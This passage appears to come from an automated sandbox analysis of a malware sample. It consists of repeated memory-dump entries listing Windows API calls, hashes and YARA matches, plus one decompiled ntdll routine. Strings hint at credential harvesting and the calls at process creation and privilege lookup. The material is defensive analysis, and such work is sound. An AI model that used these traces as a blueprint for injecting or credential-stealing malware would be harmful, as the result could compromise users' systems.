                                                                                • Opcode Fuzzy Hash: e19f37e953721989aeeb1c47c9cf8615977a00899c9e78a2ab8e297a5b45b7b5
                                                                                • Instruction Fuzzy Hash: BF9002E164200003650571594424616400A97E0645F51C022E1005590DC669D8917165
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7df030aa54e7024d6e681cac87081d46d18fbe27163ae2e5e046f01381107ca9
                                                                                • Instruction ID: b93407066e22458d3c147372c584b0735e430a3393f47584dc6d9a2dc5bb539d
                                                                                • Opcode Fuzzy Hash: 7df030aa54e7024d6e681cac87081d46d18fbe27163ae2e5e046f01381107ca9
                                                                                • Instruction Fuzzy Hash: 219002B164504842F54071594414A46001597D0749F51C012A0055694D9769DD55B6A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9ba42ca63e8772c4ab27411dc26f80e613e520653f90f76b1b78a96e59298c27
                                                                                • Instruction ID: 0e592020cb98ff5b832b12159b0d9547bee00b65e53870ffcf1d9e7a3e3631f4
                                                                                • Opcode Fuzzy Hash: 9ba42ca63e8772c4ab27411dc26f80e613e520653f90f76b1b78a96e59298c27
                                                                                • Instruction Fuzzy Hash: 949002B164100802F5807159441464A000597D1745F91C016A0016654DCB59DA5977E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 755bb94de997e5ce49a9ebb2ac94fe26ccf355ce658f5a9e0f93260889f5ebc5
                                                                                • Instruction ID: 75ac8cd5de5cb901104cd1da5ee21c345aa624b650c84ddf4cb11d69b16a3187
                                                                                • Opcode Fuzzy Hash: 755bb94de997e5ce49a9ebb2ac94fe26ccf355ce658f5a9e0f93260889f5ebc5
                                                                                • Instruction Fuzzy Hash: E79004F174100C43F500715D4414F470005D7F0745F51C017F0115754DC75DDC517571
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3a276794bc11cf64bd7129aa3d194e705ba5deb5081feb65debeb0da2d3c4510
                                                                                • Instruction ID: 273c1914f9f61336ce34cf08eed2dac0f287e45b693d757f8ac8a904a94299f8
                                                                                • Opcode Fuzzy Hash: 3a276794bc11cf64bd7129aa3d194e705ba5deb5081feb65debeb0da2d3c4510
                                                                                • Instruction Fuzzy Hash: C19002B164108802F5106159841474A000597D0745F55C412A4415658D87D9D8917161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b87988d611aab0bc6567d35c516bb05e649227d1cd0109c36e30155096cf526e
                                                                                • Instruction ID: e333c5c94e57338513060a92b073726ac3c7360d5d1ad90e13c540032f2f9135
                                                                                • Opcode Fuzzy Hash: b87988d611aab0bc6567d35c516bb05e649227d1cd0109c36e30155096cf526e
                                                                                • Instruction Fuzzy Hash: FE9002B164100402F50065995418646000597E0745F51D012A5015555EC7A9D8917171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2d39a978df01b29761101e78725cea3e8c7dec8afe0691cc455500998cded491
                                                                                • Instruction ID: 37213031359dda923dd6f98d3265d8013ba4a01950a259a08662606e34f8cd01
                                                                                • Opcode Fuzzy Hash: 2d39a978df01b29761101e78725cea3e8c7dec8afe0691cc455500998cded491
                                                                                • Instruction Fuzzy Hash: 2B9002B175114402F51061598414706000597D1645F51C412A0815558D87D9D8917162
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 728d34d31e5e265cf07ec9b7cb4ae64b8f2c7a2b9e06af892053db9d6b858ace
                                                                                • Instruction ID: 7ddb1ddab141a846d401041bdf828696ef56d11b63557b8c935d4a70bc2e9b2b
                                                                                • Opcode Fuzzy Hash: 728d34d31e5e265cf07ec9b7cb4ae64b8f2c7a2b9e06af892053db9d6b858ace
                                                                                • Instruction Fuzzy Hash: 0A9002A965300002F5807159541860A000597D1646F91D416A0006558CCA59D8696361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e4914611bef308c25d36878e2ea8d2d66c9caae110ac693680ef549f6d5a8c53
                                                                                • Instruction ID: dc9e4e62f02b3fec119dad3091b4002eaffab49fe807f2b09ed21cdea8c2caa6
                                                                                • Opcode Fuzzy Hash: e4914611bef308c25d36878e2ea8d2d66c9caae110ac693680ef549f6d5a8c53
                                                                                • Instruction Fuzzy Hash: 4A9002A1682041527945B15944145074006A7E0685B91C013A1405950C866AE856E661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0

APIs
Memory Dump Source
• Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
• Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
• Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

APIs
Memory Dump Source
• Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
• Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
• Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

APIs
Memory Dump Source
• Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
• Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
• Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

APIs
• Sleep.KERNELBASE(000007D0), ref: 00506F78
Strings
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229

APIs
• Sleep.KERNELBASE(000007D0), ref: 00506F78
Strings
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229

APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,004F3B93), ref: 005084ED
Strings
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116

APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004F72BA
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004F72DB
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0

APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004F9B82
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00508584
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00508584
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,004FCCC0,?,?), ref: 0050703C
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,004FCF92,004FCF92,?,00000000,?,?), ref: 00508650
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0

APIs
• RtlAllocateHeap.NTDLL(00503506,?,00503C7F,00503C7F,?,00503506,?,?,?,?,?,00000000,00000000,?), ref: 005084AD
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,004FCF92,004FCF92,?,00000000,?,?), ref: 00508650
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,004F7C63,?), ref: 004FD42B
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,004F7C63,?), ref: 004FD42B
Memory Dump Source
• Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e485c76660bf993b6d17da5894bf577c802efaa962f1cae454e85558a7b17960
                                                                                • Instruction ID: 1f7a777915ea4ab869f63204e8fb7cbd24bd304ab3836e43d79909ca44384a1b
                                                                                • Opcode Fuzzy Hash: e485c76660bf993b6d17da5894bf577c802efaa962f1cae454e85558a7b17960
                                                                                • Instruction Fuzzy Hash: 6DB09BF1D414C5D5FF51D7604608717790077D0745F16C057D1020655A477CD091F6B5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: :$Port:User :$Server:$User :
                                                                                • API String ID: 0-1282517814
                                                                                • Opcode ID: d619e99cb3fe7f70621602f5a00a1117a9170200354a69ffcdcc1168e025a34e
                                                                                • Instruction ID: 376be413e6082b1197cc8eb25fa68009ec8edd3b2fe7b6838af2c76c9f6c0501
                                                                                • Opcode Fuzzy Hash: d619e99cb3fe7f70621602f5a00a1117a9170200354a69ffcdcc1168e025a34e
                                                                                • Instruction Fuzzy Hash: 8D5196B2801209A6CF21DFA4DC859DEBBBCFF58310F048999F54963145EE35E6888BE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 69fbba612b46ac37ac6ba054ee88484481a034919c6103fe63875074f85fa1ec
                                                                                • Instruction ID: f76e0cf7679aa73f3aaa5bfc78df0e3cff430672523bb97b808194b79f4bd799
                                                                                • Opcode Fuzzy Hash: 69fbba612b46ac37ac6ba054ee88484481a034919c6103fe63875074f85fa1ec
                                                                                • Instruction Fuzzy Hash: 67F0A4B7A1660629E9109574BC46ABBB75CFFE2218F402225FC49D1187F263C61489A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 30ddec6b2f6df963080bcee46e1422e9a792c10e9b47600ed0e96d7a59673b2e
                                                                                • Instruction ID: a38dc24f6f9d0002091ee2befddc3477a5e74ebf1d9bf2573de23f7ea3fdd34c
                                                                                • Opcode Fuzzy Hash: 30ddec6b2f6df963080bcee46e1422e9a792c10e9b47600ed0e96d7a59673b2e
                                                                                • Instruction Fuzzy Hash: 4FE02B37B080DD46C7020D79A4440B4FF20D58723571827FBDE849B543C2214416C388
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84b60ba7592ecf7b06ae3c19c1b5c885ede942efa4d7e8c0635a513bf845ae93
                                                                                • Instruction ID: 6fe33dd33252c2f6f82ed75b84bd0eea641323b8dc639e8165b608f1b0e1d625
                                                                                • Opcode Fuzzy Hash: 84b60ba7592ecf7b06ae3c19c1b5c885ede942efa4d7e8c0635a513bf845ae93
                                                                                • Instruction Fuzzy Hash: 9EC04C23B66005499910984979411F9FBA99797124E446297E82877250964395554189
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Flags
                                                                                • String ID: Uopen$open$open
                                                                                • API String ID: 3401871038-2333744248
                                                                                • Opcode ID: 4f6e6a791fa9974c659c5605c97a337e6f48a02a4de5232eafc5dc0d69c2f3c1
                                                                                • Instruction ID: 04e7fb67daa2177b434f0093b9f9fc01a769f629469ef5eacb814f7aa5bbce11
                                                                                • Opcode Fuzzy Hash: 4f6e6a791fa9974c659c5605c97a337e6f48a02a4de5232eafc5dc0d69c2f3c1
                                                                                • Instruction Fuzzy Hash: 1511CB729403197AEB10EAA4CC46FDE7B6CAF40700F144188FA0C7B1C2D6B47A8587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Flags
                                                                                • String ID: Uopen$open$open
                                                                                • API String ID: 3401871038-2333744248
                                                                                • Opcode ID: 1510842b3563bad0a73086b71acc05e3d9cb6b7a5fcc328f68d9ac8a591a9d7f
                                                                                • Instruction ID: 4f3b2caadc65fab8153cb4cba3e66a37dc2a70597f3e5bcf958d2d193b87dd10
                                                                                • Opcode Fuzzy Hash: 1510842b3563bad0a73086b71acc05e3d9cb6b7a5fcc328f68d9ac8a591a9d7f
                                                                                • Instruction Fuzzy Hash: 1E118D729503197AE710EAA4CC46FDF7B6C9F44700F144145F708771C6DAB47A8587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E0451FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                				void* _t7;
                                                                                				intOrPtr _t9;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr* _t12;
                                                                                				intOrPtr* _t13;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr* _t15;
                                                                                
                                                                                				_t13 = __edx;
                                                                                				_push(_a4);
                                                                                				_t14 =  *[fs:0x18];
                                                                                				_t15 = _t12;
                                                                                				_t7 = E044CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                				_push(_t13);
                                                                                				E04515720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                				_t9 =  *_t15;
                                                                                				if(_t9 == 0xffffffff) {
                                                                                					_t10 = 0;
                                                                                				} else {
                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                				}
                                                                                				_push(_t10);
                                                                                				_push(_t15);
                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                				return E04515720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                			}

                                                                                0x0451fdda
                                                                                0x0451fde2
                                                                                0x0451fde5
                                                                                0x0451fdec
                                                                                0x0451fdfa
                                                                                0x0451fdff
                                                                                0x0451fe0a
                                                                                0x0451fe0f
                                                                                0x0451fe17
                                                                                0x0451fe1e
                                                                                0x0451fe19
                                                                                0x0451fe19
                                                                                0x0451fe19
                                                                                0x0451fe20
                                                                                0x0451fe21
                                                                                0x0451fe22
                                                                                0x0451fe25
                                                                                0x0451fe40

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0451FDFA
                                                                                Strings
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0451FE2B
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0451FE01
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                • API String ID: 885266447-3903918235
                                                                                • Opcode ID: e5e7f51d699175f1c0063cd4d779cad5fa50c2bdde30b686c6bd265ebd185239
                                                                                • Instruction ID: cbe62b7aaa43994465f8bbe39536c80fdf6ac20586e93e7c4b1d513159c06821
                                                                                • Opcode Fuzzy Hash: e5e7f51d699175f1c0063cd4d779cad5fa50c2bdde30b686c6bd265ebd185239
                                                                                • Instruction Fuzzy Hash: F4F0F636200201BFFA211A45DC42F63BF5BFB84770F240315F628565E1EAA2F860A6F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%